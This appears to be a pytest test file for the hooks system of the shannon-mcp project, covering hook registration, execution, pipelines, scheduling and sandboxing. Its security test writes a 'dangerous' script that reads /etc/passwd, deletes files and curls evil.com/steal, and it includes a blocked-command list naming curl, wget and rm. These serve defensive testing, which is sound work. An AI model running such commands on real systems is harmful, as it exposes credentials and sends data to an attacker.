Skip to main content
Glama
test_complete_hooks.py26 kB
""" Exhaustive functional tests for EVERY hooks system function. Tests all hooks functionality with real Claude Code execution. """ import pytest import asyncio import json import tempfile import shutil import subprocess from pathlib import Path from datetime import datetime from typing import Dict, List, Any, Optional, Callable from shannon_mcp.hooks.manager import HooksManager, Hook, HookEvent from shannon_mcp.hooks.executor import HookExecutor from shannon_mcp.hooks.registry import HookRegistry from shannon_mcp.managers.session import SessionManager from shannon_mcp.managers.binary import BinaryManager from shannon_mcp.storage.database import Database class TestCompleteHooksSystem: """Test every single hooks system function comprehensively.""" @pytest.fixture async def hooks_setup(self): """Set up hooks testing environment.""" temp_dir = tempfile.mkdtemp() db_path = Path(temp_dir) / "hooks.db" db = Database(db_path) await db.initialize() binary_manager = BinaryManager() session_manager = SessionManager(binary_manager=binary_manager) registry = HookRegistry(db=db) executor = HookExecutor() hooks_manager = HooksManager( registry=registry, executor=executor, session_manager=session_manager ) await hooks_manager.initialize() # Create test scripts directory scripts_dir = Path(temp_dir) / "scripts" scripts_dir.mkdir() yield { "manager": hooks_manager, "registry": registry, "executor": executor, "session_manager": session_manager, "db": db, "temp_dir": temp_dir, "scripts_dir": scripts_dir } # Cleanup await hooks_manager.cleanup() await session_manager.cleanup() await db.close() shutil.rmtree(temp_dir) async def test_hooks_manager_initialization(self, hooks_setup): """Test HooksManager initialization with all options.""" db = hooks_setup["db"] # Test with default options manager1 = HooksManager(db=db) await manager1.initialize() assert manager1.max_hooks == 100 assert manager1.execution_timeout == 30 # Test with custom options manager2 = HooksManager( db=db, max_hooks=50, execution_timeout=60, parallel_execution=True, max_parallel=5, retry_failed=True, max_retries=3, log_executions=True ) await manager2.initialize() assert manager2.max_hooks == 50 assert manager2.execution_timeout == 60 assert manager2.parallel_execution is True assert manager2.max_parallel == 5 async def test_hook_registration_complete(self, hooks_setup): """Test hook registration with all options.""" manager = hooks_setup["manager"] scripts_dir = hooks_setup["scripts_dir"] # Create test hook scripts shell_script = scripts_dir / "test_hook.sh" shell_script.write_text("""#!/bin/bash echo "Hook executed: $1" echo "Session ID: $SESSION_ID" echo "Event: $EVENT_TYPE" exit 0 """) shell_script.chmod(0o755) python_script = scripts_dir / "test_hook.py" python_script.write_text("""#!/usr/bin/env python3 import sys import os import json event_data = json.loads(sys.argv[1]) if len(sys.argv) > 1 else {} print(f"Python hook executed: {event_data}") print(f"Environment: {os.environ.get('SESSION_ID', 'N/A')}") """) python_script.chmod(0o755) # Test basic hook registration hook1 = await manager.register_hook({ "name": "BasicHook", "event": "session.start", "command": str(shell_script) }) assert hook1.id is not None assert hook1.name == "BasicHook" assert hook1.event == "session.start" assert hook1.enabled is True # Test hook with full configuration hook2 = await manager.register_hook({ "name": "AdvancedHook", "event": "session.complete", "command": str(python_script), "description": "Advanced Python hook with full config", "enabled": True, "priority": 10, "timeout": 45, "retry_on_failure": True, "max_retries": 2, "retry_delay": 5, "environment": { "CUSTOM_VAR": "custom_value", "DEBUG": "true" }, "working_directory": str(scripts_dir), "run_in_background": False, "capture_output": True, "success_codes": [0, 1], "tags": ["testing", "python", "advanced"], "metadata": { "author": "test_user", "version": "1.0.0" } }) assert hook2.priority == 10 assert hook2.timeout == 45 assert hook2.environment["CUSTOM_VAR"] == "custom_value" assert hook2.tags == ["testing", "python", "advanced"] # Test different event types events = [ "session.start", "session.complete", "session.error", "prompt.before", "prompt.after", "response.received", "checkpoint.created", "checkpoint.restored", "agent.task_start", "agent.task_complete", "error.occurred", "metric.threshold", "custom.event" ] for event in events: hook = await manager.register_hook({ "name": f"Hook_{event.replace('.', '_')}", "event": event, "command": f"echo 'Handling {event}'" }) assert hook.event == event async def test_hook_execution_complete(self, hooks_setup): """Test hook execution with all scenarios.""" manager = hooks_setup["manager"] session_manager = hooks_setup["session_manager"] scripts_dir = hooks_setup["scripts_dir"] # Create various test scripts success_script = scripts_dir / "success.sh" success_script.write_text("""#!/bin/bash echo "Success output" echo "Error output" >&2 exit 0 """) success_script.chmod(0o755) failure_script = scripts_dir / "failure.sh" failure_script.write_text("""#!/bin/bash echo "Failing..." exit 1 """) failure_script.chmod(0o755) slow_script = scripts_dir / "slow.sh" slow_script.write_text("""#!/bin/bash sleep 2 echo "Finally done" """) slow_script.chmod(0o755) data_script = scripts_dir / "data.py" data_script.write_text("""#!/usr/bin/env python3 import sys import json data = json.loads(sys.argv[1]) print(json.dumps({ "received": data, "processed": True, "count": len(data) })) """) data_script.chmod(0o755) # Register hooks success_hook = await manager.register_hook({ "name": "SuccessHook", "event": "test.success", "command": str(success_script) }) failure_hook = await manager.register_hook({ "name": "FailureHook", "event": "test.failure", "command": str(failure_script), "retry_on_failure": True, "max_retries": 2 }) timeout_hook = await manager.register_hook({ "name": "TimeoutHook", "event": "test.timeout", "command": str(slow_script), "timeout": 1 }) data_hook = await manager.register_hook({ "name": "DataHook", "event": "test.data", "command": str(data_script) + " '{data}'" }) # Test successful execution result1 = await manager.execute_hook( event="test.success", context={"session_id": "test_session"} ) assert result1["success"] is True assert "Success output" in result1["output"] assert "Error output" in result1["error"] # Test failure with retry result2 = await manager.execute_hook( event="test.failure", context={"session_id": "test_session"} ) assert result2["success"] is False assert result2["retries"] == 2 # Test timeout result3 = await manager.execute_hook( event="test.timeout", context={"session_id": "test_session"} ) assert result3["success"] is False assert "timeout" in result3["error"].lower() # Test data passing test_data = {"items": ["a", "b", "c"], "count": 3} result4 = await manager.execute_hook( event="test.data", context={"session_id": "test_session"}, data=test_data ) assert result4["success"] is True parsed = json.loads(result4["output"]) assert parsed["received"] == test_data assert parsed["processed"] is True async def test_hook_conditions_filters(self, hooks_setup): """Test hook conditions and filters.""" manager = hooks_setup["manager"] scripts_dir = hooks_setup["scripts_dir"] # Create conditional script conditional_script = scripts_dir / "conditional.sh" conditional_script.write_text("""#!/bin/bash echo "Condition met, executing hook" """) conditional_script.chmod(0o755) # Register hooks with conditions hook1 = await manager.register_hook({ "name": "ConditionalHook1", "event": "session.complete", "command": str(conditional_script), "conditions": { "min_duration": 60, # Only if session > 1 minute "max_duration": 3600, # Only if session < 1 hour "success_only": True } }) hook2 = await manager.register_hook({ "name": "ConditionalHook2", "event": "prompt.after", "command": str(conditional_script), "conditions": { "prompt_contains": ["error", "bug", "issue"], "response_contains": ["fixed", "resolved"], "min_tokens": 100 } }) hook3 = await manager.register_hook({ "name": "ConditionalHook3", "event": "metric.threshold", "command": str(conditional_script), "conditions": { "metric_name": "memory_usage", "threshold": 80, "comparison": "greater_than" } }) # Test condition evaluation # Session duration condition should_run1 = await manager.evaluate_conditions( hook1, context={ "duration": 120, # 2 minutes "success": True } ) assert should_run1 is True should_not_run1 = await manager.evaluate_conditions( hook1, context={ "duration": 30, # 30 seconds "success": True } ) assert should_not_run1 is False # Content condition should_run2 = await manager.evaluate_conditions( hook2, context={ "prompt": "I found an error in the code", "response": "The error has been fixed", "total_tokens": 150 } ) assert should_run2 is True # Metric threshold condition should_run3 = await manager.evaluate_conditions( hook3, context={ "metric_name": "memory_usage", "value": 85 } ) assert should_run3 is True async def test_hook_chains_pipelines(self, hooks_setup): """Test hook chains and pipelines.""" manager = hooks_setup["manager"] scripts_dir = hooks_setup["scripts_dir"] # Create pipeline scripts for i in range(4): script = scripts_dir / f"pipeline_{i}.sh" script.write_text(f"""#!/bin/bash INPUT="${{HOOK_PREVIOUS_OUTPUT:-initial}}" echo "Stage {i}: Processing $INPUT" echo "HOOK_OUTPUT=stage{i}_$INPUT" """) script.chmod(0o755) # Create hook pipeline pipeline = await manager.create_pipeline({ "name": "DataProcessingPipeline", "description": "Multi-stage data processing", "stages": [ { "name": "validation", "command": str(scripts_dir / "pipeline_0.sh"), "timeout": 30, "continue_on_failure": False }, { "name": "transformation", "command": str(scripts_dir / "pipeline_1.sh"), "timeout": 30 }, { "name": "enrichment", "command": str(scripts_dir / "pipeline_2.sh"), "timeout": 30 }, { "name": "storage", "command": str(scripts_dir / "pipeline_3.sh"), "timeout": 30 } ] }) # Execute pipeline result = await manager.execute_pipeline( pipeline_id=pipeline.id, event="data.process", initial_data={"value": "test_data"} ) assert result["success"] is True assert len(result["stage_results"]) == 4 assert all(stage["success"] for stage in result["stage_results"]) # Test conditional pipeline conditional_pipeline = await manager.create_pipeline({ "name": "ConditionalPipeline", "stages": [ { "name": "check", "command": "test -f /tmp/proceed && echo 'proceed' || echo 'stop'", "stop_on_output": "stop" }, { "name": "process", "command": "echo 'Processing...'", "skip_condition": "previous_output == 'stop'" } ] }) # Test hook chaining chain = await manager.create_chain({ "name": "NotificationChain", "hooks": [ { "hook_id": hook1.id, "pass_output": True }, { "command": "echo 'Notification sent'", "only_if_previous_success": True } ] }) async def test_hook_scheduling(self, hooks_setup): """Test scheduled hooks.""" manager = hooks_setup["manager"] scripts_dir = hooks_setup["scripts_dir"] # Create scheduled script scheduled_script = scripts_dir / "scheduled.sh" scheduled_script.write_text("""#!/bin/bash echo "Scheduled task executed at $(date)" """) scheduled_script.chmod(0o755) # Register scheduled hooks cron_hook = await manager.register_scheduled_hook({ "name": "DailyCleanup", "command": str(scheduled_script), "schedule": { "type": "cron", "expression": "0 2 * * *", # 2 AM daily "timezone": "UTC" }, "enabled": True }) interval_hook = await manager.register_scheduled_hook({ "name": "HealthCheck", "command": str(scheduled_script), "schedule": { "type": "interval", "seconds": 300, # Every 5 minutes "start_immediately": False } }) # Test schedule validation next_run = await manager.get_next_run_time(cron_hook.id) assert next_run is not None # Test manual trigger result = await manager.trigger_scheduled_hook(cron_hook.id) assert result["success"] is True # Test schedule management await manager.pause_scheduled_hook(interval_hook.id) status = await manager.get_scheduled_hook_status(interval_hook.id) assert status["paused"] is True await manager.resume_scheduled_hook(interval_hook.id) status = await manager.get_scheduled_hook_status(interval_hook.id) assert status["paused"] is False # Test execution history history = await manager.get_scheduled_hook_history( cron_hook.id, limit=10 ) assert len(history) >= 1 async def test_hook_templates_library(self, hooks_setup): """Test hook templates and library.""" manager = hooks_setup["manager"] # Test built-in templates templates = await manager.list_templates() assert len(templates) > 0 # Create custom template template = await manager.create_template({ "name": "ErrorNotification", "description": "Send notification on errors", "category": "notifications", "variables": { "webhook_url": { "type": "string", "required": True, "description": "Webhook URL for notifications" }, "min_severity": { "type": "string", "default": "error", "choices": ["warning", "error", "critical"] } }, "command": """#!/bin/bash curl -X POST "{webhook_url}" \\ -H "Content-Type: application/json" \\ -d '{ "severity": "{severity}", "message": "{message}", "timestamp": "{timestamp}" }' """, "events": ["error.occurred"], "tags": ["notification", "webhook"] }) # Use template to create hook hook = await manager.create_hook_from_template( template_id=template.id, variables={ "webhook_url": "https://example.com/webhook", "min_severity": "error" }, name="ProductionErrorNotifier" ) assert hook.name == "ProductionErrorNotifier" # Test template sharing exported = await manager.export_template(template.id) assert "name" in exported assert "command" in exported imported = await manager.import_template(exported) assert imported.name == template.name async def test_hook_security_sandboxing(self, hooks_setup): """Test hook security and sandboxing.""" manager = hooks_setup["manager"] scripts_dir = hooks_setup["scripts_dir"] # Create potentially dangerous scripts dangerous_script = scripts_dir / "dangerous.sh" dangerous_script.write_text("""#!/bin/bash # Attempt to access sensitive files cat /etc/passwd rm -rf /tmp/test curl http://evil.com/steal """) dangerous_script.chmod(0o755) # Test security restrictions with pytest.raises(Exception): await manager.register_hook({ "name": "DangerousHook", "event": "test.danger", "command": str(dangerous_script), "security_level": "strict" # Should reject dangerous commands }) # Test sandboxed execution sandboxed_hook = await manager.register_hook({ "name": "SandboxedHook", "event": "test.sandbox", "command": "echo 'Running in sandbox'", "sandbox": { "enabled": True, "filesystem": "readonly", "network": "disabled", "max_memory": "100M", "max_cpu": "50%", "allowed_paths": [str(scripts_dir)], "blocked_commands": ["curl", "wget", "rm"], "timeout": 10 } }) # Test resource limits resource_script = scripts_dir / "resource_heavy.sh" resource_script.write_text("""#!/bin/bash # Try to use excessive resources dd if=/dev/zero of=/tmp/bigfile bs=1M count=1000 """) resource_script.chmod(0o755) limited_hook = await manager.register_hook({ "name": "ResourceLimitedHook", "event": "test.resources", "command": str(resource_script), "resource_limits": { "max_memory": "50M", "max_disk": "10M", "max_time": 5 } }) # Execute with limits - should fail due to disk limit result = await manager.execute_hook( event="test.resources", context={} ) assert result["success"] is False assert "resource limit" in result["error"].lower() async def test_hook_monitoring_analytics(self, hooks_setup): """Test hook monitoring and analytics.""" manager = hooks_setup["manager"] # Register hooks for monitoring hooks = [] for i in range(5): hook = await manager.register_hook({ "name": f"MonitoredHook{i}", "event": "test.monitor", "command": f"echo 'Hook {i} executed'" }) hooks.append(hook) # Execute hooks multiple times for _ in range(10): await manager.execute_hook( event="test.monitor", context={"iteration": _} ) # Get execution statistics stats = await manager.get_hook_statistics() assert stats["total_executions"] >= 50 assert stats["total_hooks"] >= 5 # Get per-hook statistics for hook in hooks: hook_stats = await manager.get_hook_statistics(hook.id) assert hook_stats["executions"] >= 10 assert "average_duration" in hook_stats assert "success_rate" in hook_stats # Test performance metrics metrics = await manager.get_performance_metrics( period="hour", grouping="hook" ) assert len(metrics) >= 5 # Test failure analysis failures = await manager.analyze_failures( time_range="24h", group_by="error_type" ) assert isinstance(failures, dict) # Test execution timeline timeline = await manager.get_execution_timeline( start_time=datetime.utcnow() - timedelta(hours=1), end_time=datetime.utcnow() ) assert len(timeline) >= 50 # Test alerts alert = await manager.create_execution_alert({ "name": "HighFailureRate", "condition": "failure_rate > 0.5", "window": "5m", "actions": ["disable_hook", "notify_admin"] }) assert alert.id is not None async def test_hook_debugging_tools(self, hooks_setup): """Test hook debugging and development tools.""" manager = hooks_setup["manager"] scripts_dir = hooks_setup["scripts_dir"] # Create debug script debug_script = scripts_dir / "debug.sh" debug_script.write_text("""#!/bin/bash echo "Debug: Starting execution" echo "Args: $@" >&2 echo "Env: $(env | grep HOOK_)" >&2 echo "Debug: Completed" """) debug_script.chmod(0o755) # Register hook with debugging debug_hook = await manager.register_hook({ "name": "DebugHook", "event": "test.debug", "command": str(debug_script), "debug": True, "log_level": "DEBUG" }) # Test dry run dry_run_result = await manager.dry_run_hook( hook_id=debug_hook.id, context={"test": "value"}, capture_output=True ) assert dry_run_result["would_execute"] is True assert "command" in dry_run_result assert "environment" in dry_run_result # Test hook validation validation = await manager.validate_hook(debug_hook.id) assert validation["valid"] is True assert validation["executable"] is True assert validation["syntax_valid"] is True # Test execution trace trace_result = await manager.execute_hook_with_trace( event="test.debug", context={"trace": "enabled"} ) assert "trace" in trace_result assert "timeline" in trace_result["trace"] assert "environment_snapshot" in trace_result["trace"] # Test hook testing framework test_result = await manager.test_hook( hook_id=debug_hook.id, test_cases=[ { "name": "basic_test", "context": {"key": "value"}, "expected_output": "Debug: Completed", "expected_exit_code": 0 }, { "name": "empty_context", "context": {}, "expected_exit_code": 0 } ] ) assert test_result["passed"] == 2 assert test_result["failed"] == 0

Latest Blog Posts

MCP directory API

We provide all the information about MCP servers via our MCP API.

curl -X GET 'https://glama.ai/api/mcp/v1/servers/krzemienski/shannon-mcp'

If you have feedback or need assistance with the MCP directory API, please join our Discord server